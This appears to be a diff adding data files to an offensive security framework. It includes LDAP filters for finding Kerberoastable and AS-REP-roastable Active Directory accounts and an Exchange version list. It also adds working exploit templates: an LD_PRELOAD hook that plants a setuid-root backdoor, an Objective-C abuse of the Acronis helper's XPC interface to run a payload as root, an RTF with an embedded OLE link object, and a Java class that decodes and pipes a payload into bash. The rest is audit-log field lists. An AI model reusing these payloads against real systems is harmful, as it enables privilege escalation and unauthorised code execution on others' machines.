+  - action: ENUM_ORGUNITS
+    description: 'Dump info about all known organizational units in the LDAP environment.'
+    filter: '(objectClass=organizationalUnit)'
+    attributes:
+      - displayName
+      - name
+      - description
+    references:
+      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
+  - action: ENUM_UNCONSTRAINED_DELEGATION
+    description: 'Dump info about all known objects that allow uncontrained delegation.'
+    filter: '(userAccountControl:1.2.840.113556.1.4.803:=524288)'
+    attributes:
+      - cn
+      - sAMAccountName
+      - objectCategory
+      - memberof
+      - member
+    references:
+      - https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation
+      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
+  - action: ENUM_USER_ACCOUNT_DISABLED
+    description: 'Dump info about disabled user accounts.'
+    filter: '(userAccountControl:1.2.840.113556.1.4.803:=2)'
+    attributes:
+      - cn
+      - displayName
+      - description
+      - sAMAccountName
+      - userPrincipalName
+      - userAccountControl
+  - action: ENUM_USER_ACCOUNT_LOCKED_OUT
+    description: 'Dump info about locked out user accounts.'
+    filter: '(userAccountControl:1.2.840.113556.1.4.803:=16)'
+    attributes:
+      - cn
+      - displayName
+      - sAMAccountName
+      - userPrincipalName
+      - userAccountControl
+    references:
+      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
+  - action: ENUM_USER_ASREP_ROASTABLE
+    description: 'Dump info about all users who are configured not to require kerberos pre-authentication and are therefore AS-REP roastable.'
+    filter: '(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))'
+    attributes:
+      - cn
+      - displayName
+      - description
+      - sAMAccountName
+      - userPrincipalName
+      - userAccountControl
+    references:
+      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
+      - https://burmat.gitbook.io/security/hacking/domain-exploitation
+  - action: ENUM_USER_PASSWORD_NEVER_EXPIRES
+    description: 'Dump info about all users whose password never expires.'
+    filter: '(userAccountControl:1.2.840.113556.1.4.803:=65536)'
+    attributes:
+      - cn
+      - displayName
+      - description
+      - sAMAccountName
+      - userPrincipalName
+      - userAccountControl
+    references:
+      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
+  - action: ENUM_USER_PASSWORD_NOT_REQUIRED
+    description: 'Dump info about all users whose password never expires and whose account is still enabled.'
+    filter: '(&(userAccountControl:1.2.840.113556.1.4.803:=32)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'
+    attributes:
+      - cn
+      - displayName
+      - description
+      - sAMAccountName
+      - userPrincipalName
+      - userAccountControl
+    references:
+      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
+  - action: ENUM_USER_SPNS_KERBEROAST
+    description: 'Dump info about all user objects with Service Principal Names (SPNs) for kerberoasting.'
+    filter: '(&(&(servicePrincipalName=*)(userAccountControl:1.2.840.113556.1.4.803:=512))(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'
+    attributes:
+      - cn
+      - sAMAccountName
+      - servicePrincipalName
+    references:
+      - https://malicious.link/post/2022/ldapsearch-reference/
+      - https://burmat.gitbook.io/security/hacking/domain-exploitation
+      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
@@ -2,6 +2,7 @@
 queries:
 #  - action: SAMPLE_ACTION
 #    description: 'A description.'
+#    # base_dn_prefix: 'An optional string to prefix to the Base DN'
 #    filter: '(objectClass=*)'
 #    attributes:
 #      - dn
@@ -186,6 +186,9 @@
    {
      "name": "Exchange Server 2013",
      "builds": [
+        "15.0.1497.40",
+        "15.0.1497.36",
+        "15.0.1497.33",
        "15.0.1497.28",
        "15.0.1497.26",
        "15.0.1497.24",
@@ -226,6 +229,12 @@
    {
      "name": "Exchange Server 2016",
      "builds": [
+        "15.1.2507.12",
+        "15.1.2507.9",
+        "15.1.2507.6",
+        "15.1.2375.31",
+        "15.1.2375.28",
+        "15.1.2375.24",
        "15.1.2375.18",
        "15.1.2375.17",
        "15.1.2375.12",
@@ -280,6 +289,12 @@
    {
      "name": "Exchange Server 2019",
      "builds": [
+        "15.2.1118.12",
+        "15.2.1118.9",
+        "15.2.1118.7",
+        "15.2.986.29",
+        "15.2.986.26",
+        "15.2.986.22",
        "15.2.986.15",
        "15.2.986.14",
        "15.2.986.9",
@@ -318,4 +333,4 @@
      "eol": false
    }
  ]
-}
+}
@@ -0,0 +1,15 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <sys/stat.h>
+#include <unistd.h>
+#include <dlfcn.h>
+uid_t geteuid(void) {
+	static uid_t  (*old_geteuid)();
+	old_geteuid = dlsym(RTLD_NEXT, "geteuid");
+	if ( old_geteuid() == 0 ) {
+		chown("$BACKDOORPATH", 0, 0);
+		chmod("$BACKDOORPATH", 04777);
+		unlink("/etc/ld.so.preload");
+	}
+	return old_geteuid();
+}
@@ -0,0 +1,46 @@
+#import <Foundation/Foundation.h>
+
+@protocol HelperToolProtocol
+- (void)checkFullDiskAccessWithReply:(void (^)(BOOL))arg1;
+- (void)executeProcess:(NSString *)arg1 arguments:(NSArray *)arg2 caller:(int)arg3 withReply:(void (^)(int))arg4;
+- (void)getProcessIdentifierWithReply:(void (^)(int))arg1;
+@end
+
+
+int main(int argc, char *argv[])
+{
+    NSString *service_name;
+    NSString *payload = @"<%= @payload_path %>";
+    NSArray *arg_array = @[@"-c", payload];
+    NSFileManager *file_manager = [NSFileManager defaultManager];
+
+    NSString *service_name_2020 = @"com.acronis.trueimagehelper";
+    NSString *service_name_2021 = @"com.acronis.helpertool";
+    NSString *helper_path_2020 = [NSString stringWithFormat:@"/Library/PrivilegedHelperTools/%@", service_name_2020];
+    NSString *helper_path_2021 = [NSString stringWithFormat:@"/Library/PrivilegedHelperTools/%@", service_name_2021];
+
+    if ([file_manager fileExistsAtPath:helper_path_2020])
+    {
+        service_name = service_name_2020;
+    }
+    else
+    {
+        service_name = service_name_2021;
+    }
+
+    NSXPCConnection *connection = [[NSXPCConnection alloc] initWithMachServiceName:service_name options:0x1000];
+    NSXPCInterface *interface = [NSXPCInterface interfaceWithProtocol:@protocol(HelperToolProtocol)];
+    [connection setRemoteObjectInterface:interface];
+
+    [connection resume];
+
+    id obj = [connection remoteObjectProxyWithErrorHandler:^(NSError *error)
+    {
+        return;
+    }];
+
+    [obj executeProcess:@"<%= sys_shell %>" arguments:arg_array caller:<%= @pid %> withReply:^(int arg)
+    {
+        return;
+    }];
+}
@@ -0,0 +1,30 @@
+{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}
+\pard\plain \ltrpar\ql \li0\ri0\sa160\sl259\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0\pararsid15608771 \rtlch\fcs1 \af31507\afs22\alang1025 \ltrch\fcs0 \f31506\fs22\lang1033\langfe1033\cgrid\langnp1033\langfenp1033 
+{\pard\plain \ltrpar\ql \li0\ri0\sa160\sl259\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0\pararsid15608771 \rtlch\fcs1 \af31507\afs22\alang1025 \ltrch\fcs0 \f31506\fs22\lang1033\langfe1033\cgrid\langnp1033\langfenp1033 
+{\object\objautlink\rsltpict\objw4321\objh4321\objscalex1\objscaley1{\*\objclass REPLACE_WITH_URI_STRING}{\*\oleclsid \'7b00000300-0000-0000-C000-000000000046\'7d}{\*\objdata 010500000200000009000000
+4f4c45324c696e6b000000000000000000000c0000
+d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+fffffffffffffffffdfffffffefffffffeffffff04000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000c6ad98892f1d411a65f0040963251e5000000000000000000000000009e
+70f1e98bd80103000000c00200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000
+0000000000000000000000006b0100000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000
+0000000000000000000006000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000
+00000000000000000000000007000000f0000000000000000100000002000000030000000400000005000000fefffffffeffffff08000000090000000a000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020900000001000000000000002a0000000403000000000000c0000000000000460200000021000c0000005f313731383030383936380000000000f90000000903000000000000c00000000000004602000000e0c9ea79f9bace11
+8c8200aa004ba90bb20000REPLACE_WITH_URI_STRING_UTF16000000795881f43b1d7f48af2c825dc485276300000000a5ab00030403000000000000c0000000000000460200000021000100000000ffffffff0000000000000000000000000000000000000000ffffffff00000000000000
+0000000000000000000000000000000000000000000000000000000000000000000000000000100003000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004c00REPLACE_WITH_URI_STRING_ASCII
+0000bbbbcccc4cREPLACE_WITH_URI_STRING_UTF16
+000000000000000000000000000000000000000000000000000000000000000000000000000000
+000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
+0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000105000000000000}}}}}
+}}}}
@@ -0,0 +1,11 @@
+import java.util.Base64;
+
+public class PayloadRuns {
+    static {
+        try {
+            Runtime.getRuntime().exec("bash -c {echo,PAYLOAD}|{base64,-d}|{bash,-i}");
+        } catch (Exception ex) {
+            ex.printStackTrace();
+        }
+    }
+}
@@ -0,0 +1,297 @@
+---
+AdapFileAuditLog:
+- UNIQUE_ID
+# - MONITOR_ID
+# - EVENT_NUMBER
+- TIME_GENERATED
+# - EVENT_TYPE
+# - EVENT_TYPE_TEXT
+- SOURCE
+# - REMARKS
+# - OBJECT_SERVER
+# - OBJECT_TYPE
+# - HANDLE_ID
+# - OBJECT_NAME
+# - UNC_NAME
+# - FILE_NAME
+# - FILE_LOCATION
+# - LOGON_ID
+# - OPERATION_ID
+- PRIMARY_USER_NAME
+- PRIMARY_DOMAIN
+- PRIMARY_LOGIN_ID
+- CLIENT_USER_NAME
+- CLIENT_DOMAIN
+- CLIENT_LOGIN_ID
+- DOMAIN
+# - RESTRICTED_SID_COUNT
+# - ACCESSES
+# - PROCESS_ID
+# - PRIVILEGES_USED
+# - PRIVILEGES
+# - PROCESS_NAME
+# - NEW_SEC_DESC
+# - ORIGINAL_SEC_DESC
+# - NEW_PERMISSIONS
+# - ORIGINAL_PERMISSIONS
+# - ACL_CHANGE
+# - TRANSACTION_ID
+# - ACCESS_MASK
+- USERNAME
+# - RECORD_NUMBER
+- USER_SID
+# - ACCESS_TYPE
+# - ACCESS_TYPE_TEXT
+# - FORMAT_MESSAGE
+- USER_SAM_ACCOUNT_NAME
+- USER_DISPLAY_NAME
+- USER_PRINCIPAL_NAME
+- USER_GUID
+- USER_DISTINGUISH_NAME
+- USER_OU_GUID
+- USER_DEPARTMENT
+- USER_MANAGER_NAME
+- SOURCE_NAME
+# - LOG_FILE_NAME
+# - KEYWORDS_NAME
+# - TASK_CATEGORY_NAME
+# - TASK_CATEGORY_ID
+# - FILE_TYPE
+- SHARE_NAME
+# - EXTRA_COLUMN1
+# - EXTRA_COLUMN2
+# - EXTRA_COLUMN3
+# - EXTRA_COLUMN4
+# - EXTRA_COLUMN5
+# - EXTRA_COLUMN6
+# - EXTRA_COLUMN7
+# - EXTRA_COLUMN8
+# - EXTRA_COLUMN9
+# - EXTRA_COLUMN10
+- CONFIGURED_DOMAIN_NAME
+# - NEW_PRIVILEGES_USED
+AdapPowershellAuditLog:
+- UNIQUE_ID
+# - COMMAND_NAME
+# - COMMAND_PATH
+# - COMMAND_TYPE
+# - COMMAND_INVOCATION
+- EVENT_MACHINE_NAME
+- EVENT_MACHINE_DOMAIN
+# - EVENT_CATEGORY
+# - EVENT_NUMBER
+# - EVENT_TYPE
+# - HOST_APPLICATION
+- HOST_NAME
+# - SCRIPTBLOCK_ID
+# - RECORD_NUMBER
+# - SCRIPT_NAME
+# - SCRIPT_DATA
+# - SCRIPT_SNO
+# - SEVERITY
+# - TIME_GENERATED
+- CALLER_USER_NAME
+- CALLER_USER_SID
+# - TOTAL_NO
+# - MONITOR_ID
+# - EVENT_TYPE_TEXT
+# - FORMAT_MESSAGE
+# - SCRIPT_DATA_JSON
+AdapSysmonAuditLog:
+- UNIQUE_ID
+# - MONITOR_ID
+- TIME_GENERATED
+# - RECORD_NUMBER
+# - EVENT_NUMBER
+# - EVENT_TYPE
+# - EVENT_TYPE_TEXT
+- EVENT_MACHINE_NAME
+- EVENT_MACHINE_DOMAIN
+# - REMARKS
+# - FORMAT_MESSAGE
+- CALLER_USER_SID
+- CALLER_USER_NAME
+- CALLER_USER_DOMAIN
+- CALLER_USER_LOGON_ID
+- CLIENT_MACHINE_IPADDRESS
+- CLIENT_MACHINE_NAME
+- CLIENT_MACHINE_DOMAIN
+- CALLER_USER_DN
+- CALLER_USER_OU_GUID
+- CALLER_USER_DISPLAY_NAME
+- PROCESS_NAME
+- PARENT_PROCESS_NAME
+# - PROCESS_ID
+# - FILE_NAME
+# - INTEGRITY_LEVEL
+# - QUERY_STRING
+# - PARENT_PROCESS_ID
+# - PARENT_CMD_LINE
+# - QUERY_STATUS
+# - ACCESS_TYPE_TEXT
+# - ACCESS_TIME
+# - CREATION_TIME
+# - PREVIOUS_CREATION_TIME
+# - PROCESS_GUID
+# - RULE_NAME
+# - LOADED_FILE
+# - HASHED_VALUE
+# - FOLDER_PATH
+# - PARENT_PROCESS_GUID
+# - SESSION_ID
+# - IS_SIGNED
+# - SIGNATURE
+# - SIGNATURE_STATUS
+# - IS_ARCHIVED
+# - THREAD_ID
+- SOURCE_IP_ADDRESS
+# - PRODUCT_DESCRIPTION
+- DESTINATION_IP_ADDRESS
+- DESTINATION_HOST_NAME
+# - PORT_NUMBER
+# - PARENT_PORT_NUMBER
+# - REGISTRY_NAME
+# - QUERY_RESULT
+# - SCHEMA_VERSION
+# - WORKING_DIRECTORY
+- COMPANY_NAME
+- SOURCE_HOST_NAME
+- CALLER_USER_LOGON_GUID
+# - PARENT_PORT_NAME
+# - SERVICE_VERSION
+# - FILE_VERSION
+# - PRODUCT_NAME
+# - PORT_NAME
+AdapDNSAuditLog:
+- UNIQUE_ID
+# - MONITOR_ID
+# - EVENT_NUMBER
+- TIME_GENERATED
+# - EVENT_TYPE
+# - EVENT_TYPE_TEXT
+- EVENT_MACHINE_NAME
+- EVENT_MACHINE_DOMAIN
+# - REMARKS
+# - DNS_SETTING
+# - LOOKUP
+# - DNS_SCOPE
+# - DNS_OBJECT_GUID
+# - DISTINATION_ZONE
+# - OLD_DIRECTORY_PARTITION
+# - USER_ACTION
+- CALLER_USER_DOMAIN
+- CALLER_USER_NAME
+- CLIENT_MACHINE_DOMAIN
+- CALLER_USER_LOGON_ID
+# - DNS_QUERY_NAME
+# - OBJECT_CLASS_TEXT
+# - DNS_SETTING_NAME
+- DISTINGUISHED_NAME
+# - OBJECT_GUID
+# - DNS_ZONE_NAME
+# # - REGISTRY_VALUE
+# - FORMAT_MESSAGE
+# - RECORD_NUMBER
+- CALLER_USER_SID
+# - DNS_SETTING_VALUE
+# - CORRELATION_ID
+# - ATTRIBUTES_NEW_VALUE
+# - ATTRIBUTES_OLD_VALUE
+# - TTL_VALUE
+# - DNS_MGMT_TYPE
+# - DNS_ZONE_TYPE
+# - DNS_ZONE_TYPE_STRING
+- CALLER_USER_DISPLAY_NAME
+- CALLER_USER_DN
+- CALLER_USER_OU_GUID
+- CALLER_USER_GUID
+# - OP_APPLN_CORRELATION_ID
+# - OP_TREE_DELETE
+# - DIRECTORY_PARTITION
+# - ROOT_CAUSE
+# - FILE_NAME
+# - VIRTUALIZATION_INSTANCE
+# - ERROR_CODE_TEXT
+# - DNS_RESPONSE_DATA
+- DNS_SERVER_NAME
+# - LINE_NUMBER
+- CLIENT_MACHINE_IPADDRESS
+- CLIENT_MACHINE_NAME
+# - NEXT_SCAVENGE_SCHEDULE
+# - RECORD_NAME
+# - RUNNING_TIME
+# - TIME_OUT
+# - DNS_NODE
+# - DNS_ZONE_FILE
+- FOREST_NAME
+# - SCAVENGED_NODES
+# - SCAVENGED_PERC
+# - SCAVENGED_RECORDS
+# - SERVICE_NAMES
+# - SLEEPING_TIME
+# - VISITED_NODES
+# - VISITED_ZONES
+AdapADReplicationAuditLog:
+- UNIQUE_ID
+# - MONITOR_ID
+- TIME_GENERATED
+# - RECORD_NUMBER
+- EVENT_MACHINE_NAME
+- EVENT_MACHINE_DOMAIN
+# - EVENT_NUMBER
+# - EVENT_TYPE
+# - EVENT_TYPE_TEXT
+# - FORMAT_MESSAGE
+# - REMARKS
+- CALLER_USER_DOMAIN
+- CALLER_USER_NAME
+- CALLER_USER_SID
+- CALLER_USER_DN
+- CALLER_USER_OU_GUID
+- CALLER_USER_DISPLAY_NAME
+- CALLER_USER_LOGON_ID
+- CALLER_USER_GUID
+- CLIENT_MACHINE_IPADDRESS
+- CLIENT_MACHINE_NAME
+- CLIENT_MACHINE_DOMAIN
+# - ALTERNATE_USER_ACTION
+# - DIRECTORY_PARTITION
+# - ERROR_CODE
+# - ERROR_CODE_TEXT
+# - EXTENDED_REQUEST_CODE
+# - FAILING_DNS_HOST
+# - HIGHEST_USN
+# - INTERSITE_TRANSPORT
+# - LAST_REPLICATION_DATE
+# - OBJECT_GUID
+# - OBJECT_NAME
+# - COMMON_NAME_PATH
+# - OPERATION
+# - REASON
+- REGISTRY_KEY
+# - REMOVE_LINGERING_OBJECTS
+# - SECONDARY_ERROR_VALUE
+- SERVICE_PRINCIPAL_NAME
+- SITE_NAME
+- SOURCE_DIRECTORY_SERVICE
+- SOURCE_DS_DOMAIN_NAME
+- SOURCE_DS_GUID
+- SOURCE_DS_NAME
+- SOURCE_DS_STARTING_ID
+# - THREAD_ID
+# - TIMEOUT_PERIOD
+# - TOMBSTONE_LIFE_TIME
+# - TRANSPORT_NAME
+# - USER_ACTION
+# - ATTRIBUTES_NAME
+# - ATTRIBUTES_VALUE
+# - SOURCE_DRA
+# - DESTINATION_DRA
+# - DESTINATION_DS_NAME
+# - DRS_OPTIONS
+# - REPL_EVENT_COUNT
+# - REPL_STATUS_CODE
+# - SESSION_ID
+# - START_USN
+# - END_USN
+# - TYPE_OF_CHANGE
@@ -0,0 +1,259 @@
+---
+DSPEmailAuditReport:
+- UNIQUE_ID
+- TIME_GENERATED
+# - COMPLETION_TIME
+# - SOURCE_ID
+# - ENDPOINT_ID
+- ENDPOINT_NAME
+- USER_SID
+- USER_NAME
+# - ATTACHMENT_ID
+# - ACCESS_TYPE
+# - ACCESS_TYPE_MESSAGE
+# - PROCESS_NAME
+- MAIL_FROM
+- MAIL_TO
+- MAIL_BCC
+- MAIL_CC
+# - MAIL_SUBJECT
+# - MAIL_SENT_TIME
+# - MAIL_CLASSFICATION_VALUE
+# - MAIL_CLASSFICATION
+# - PROFILE_ID
+- PROFILE_NAME
+# - PROFILETYPE_ID
+# - PROFILETYPE_NAME
+DSPEndpointAuditReport:
+- UNIQUE_ID
+- TIME_GENERATED
+# - COMPLETION_TIME
+# - ENDPOINT_ID
+- ENDPOINT_NAME
+# - SOURCE_ID
+- USER_SID
+- USERNAME
+# - PROCESS_ID
+# - LAST_ACCESS_TIME
+# - LAST_WRITE_TIME
+# - CREATION_TIME
+# - FILE_ATTRIBUTES
+# - UNC_NAME
+# - LOCATION
+# - MESSAGE
+# - FILE_FOLDER_NAME
+# - NEW_FILE_NAME
+# - IMAGE_FILE_NAME
+# - OLD_SHARE_PATH
+# - NEW_SHARE_PATH
+# - SHARE_ID
+# - IS_SUCCESS_EVENT
+# - IS_DIRECTORY
+# - IS_TRANSACTION
+# - ACTION_ID
+# - ACCESS_MASK
+# - THREAD_ID
+# - CALLBACK_MAJOR_ID
+# - CALLBACK_MINOR_ID
+# - PROFILE_ID
+# - USER_ID
+# - OLD_SACL
+# - NEW_SACL
+# - DIFF_SACL
+# - FILE_SIZE
+- CLIENT_IP
+- CLIENT_HOST
+- OWNER_INFO
+# - OTHERINFO_1
+# - OTHERINFO_2
+# - IS_SENSITIVE_DATA
+# - FILETYPE_EXTENSION
+# - FILETYPE_CATEGORY
+# - ACCESS_FROM
+# - EVENT_GENERATED_BY
+# - LOGIN_ID
+- LOGIN_NAME
+- OWNER_SID
+# - IS_USB_EVENT
+# - IS_NETWORK_COPY
+# - LAST_KNOWN_COPY
+# - PROFILETYPE_ID
+# - PROFILETYPE_NAME
+DSPEndpointClassificationReport:
+- UNIQUE_ID
+- TIME_GENERATED
+# - COMPLETION_TIME
+# - SOURCE_ID
+# - ENDPOINT_ID
+- ENDPOINT_NAME
+- USER_SID
+- USER_NAME
+# - CLASSIFICATION_ID
+# - CLASSIFICATION_VALUE
+# - CLASSIFICATION_MSG
+# - LOCAL_PATH
+# - FILE_FOLDER_NAME
+# - LAST_ACCESS_TIME
+# - LAST_WRITE_TIME
+# - CREATION_TIME
+# - FILE_ATTRIBUTES
+- FILE_OWNER
+- OWNER_SID
+# - FILE_SIZE
+# - FILETYPE_EXTENSION
+# - IS_HIDDEN
+# - MEDIA_FILE
+# - FILETYPE_EXTENSION_CATEGORY
+DSPEndpointIncidentReport:
+- INCIDENT_ID
+- SOURCE
+# - MODULE_NAME
+# - INCIDENT_TIME
+# - COMPLETION_TIME
+- TIME_GENERATED
+# - MESSAGE
+# - LOCATION
+# - ENDPOINT_ID
+# - INCIDENT_STATUS
+# - VIOLATED_POLICY
+# - DOMAIN_ID
+- ENDPOINT_NAME
+- USERNAME
+# - USER_ID
+# - LAST_ACCESS_TIME
+# - LAST_WRITE_TIME
+# - FILE_SIZE
+# - CREATION_TIME
+# - REPORT_GENERATION_ID
+# - NEW_FILE_NAME
+# - IMAGE_FILE_NAME
+# - FILE_FOLDER_NAME
+- USER_SID
+# - FILETYPE_EXTENSION
+# - IS_USB_EVENT
+- NOTIFY_NAME
+- MAIL_FROM
+- MAIL_TO
+- MAIL_BCC
+- MAIL_CC
+# - MAIL_SUBJECT
+# - MAIL_SENT_TIME
+# - MAIL_CLASSFICATION
+# - PRINTER_NAME
+# - FILENAME
+# - PORT_NAME
+- MACHINE_NAME
+- PRINTER_USERNAME
+# - TOTAL_PAGES
+- CLIENTIPLIST
+- URL
+# - CLASSIFICATION_VALUE
+# - INCIDENT_PROFILE_ID
+# - INCIDENT_PROFILE_NAME
+# - INCIDENT_SEVERITY
+# - PROFILETYPE_ID
+# - PROFILETYPE_NAME
+# - IS_NETWORK_COPY
+# - LAST_KNOWN_COPY
+- CLIENT_HOST
+DspEndpointPrinterAuditReport:
+- UNIQUE_ID
+- TIME_GENERATED
+# - COMPLETION_TIME
+# - SOURCE_ID
+# - ENDPOINT_ID
+- ENDPOINT_NAME
+- USER_SID
+- USER_NAME
+# - PRINTER_NAME
+# - FILENAME
+# - LOCAL_PATH
+# - PORT_NAME
+- MACHINE_NAME
+- PRINTER_USERNAME
+- NOTIFY_NAME
+# - TOTAL_PAGES
+# - FILE_SIZE
+# - CREATION_TIME
+- CLIENTIPLIST
+# - PROFILE_ID
+- PROFILE_NAME
+# - PROFILETYPE_ID
+# - PROFILETYPE_NAME
+DspEndpointWebAuditReport:
+- UNIQUE_ID
+- TIME_GENERATED
+# - SOURCE_ID
+# - ENDPOINT_ID
+- ENDPOINT_NAME
+- USER_SID
+- USER_NAME
+# - NEW_FILE_NAME
+# - FILE_SIZE
+# - FILETYPE_EXTENSION
+# - PROCESS_NAME
+# - MESSAGE
+# - URL
+- CLIENT_IP
+# - PROFILE_ID
+- PROFILE_NAME
+DSPFileAnalysisAlerts:
+- INCIDENT_ID
+# - VIOLATED_PROFILE
+# - SERVER_ID
+# - DRIVE_LETTER
+# - SOURCE_ID
+- TIME_GENERATED
+# - SECURITY_ID
+- SERVERNAME
+# - FILE_ATTRIBUTES
+# - LAST_ACCESS_TIME
+# - LAST_WRITE_TIME
+# - FILE_SIZE
+# - CREATION_TIME
+# - REPORT_GENERATION_ID
+# - YEAR_CREATED
+# - FILE_FOLDER_NAME
+# - LOCAL_PATH
+# - FILETYPE_EXTENSION
+# - IS_HIDDEN
+# - IS_DIRECTORY
+# - IS_STALE
+# - NON_BUSINESS_FILE
+# - FILETYPE_EXTENSION_CATEGORY
+RAAlertHistory:
+- INCIDENT_ID
+# - FILE_NAME
+# - FILE_TYPE
+# - LOCATION
+- SERVER_NAME
+# - POLICY_ID
+# - POLICY_NAME
+- TIME_GENERATED
+# - NO_OF_OCCURRENCES
+- FILE_OWNER
+# - DATA_SOURCE
+# - RISK_SCORE
+# - ENTITY_ID
+RAIncidents:
+- INCIDENT_ID
+# - FILE_NAME
+# - FILE_TYPE
+# - LOCATION
+- SERVER_NAME
+# - POLICY_ID
+# - POLICY_NAME
+- TIME_GENERATED
+# - NO_OF_OCCURRENCES
+- FILE_OWNER
+# - DATA_SOURCE
+# - RAISED_INCIDENT
+# - SOURCE_ID
+# - RISK_SCORE
+# - VIOLATION_SCORE
+# - POLICY_SCORE
+# - PERMISSION_SCORE
+# - AUDIT_SCORE
+# - USER_SCORE
+# - SCORE_DESCRIPTION
+# - ENTITY_ID
@@ -0,0 +1,69 @@
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
+
+<html>
+<head>
+	<title>Example plugin changelog</title>
+    <style type="text/css">
+        BODY {
+            font-size : 100%;
+        }
+        BODY, TD, TH {
+            font-family : tahoma, verdana, arial, helvetica, sans-serif;
+            font-size : 0.8em;
+        }
+        H2 {
+             font-size : 10pt;
+             font-weight : bold;
+        }
+        A:hover {
+            text-decoration : none;
+        }
+        H1 {
+            font-family : tahoma, arial, helvetica, sans-serif;
+            font-size : 1.4em;
+            font-weight: bold;
+            border-bottom : 1px #ccc solid;
+            padding-bottom : 2px;
+        }
+
+        TT {
+            font-family : courier new;
+            font-weight : bold;
+            color : #060;
+        }
+        PRE {
+            font-family : courier new;
+            font-size : 100%;
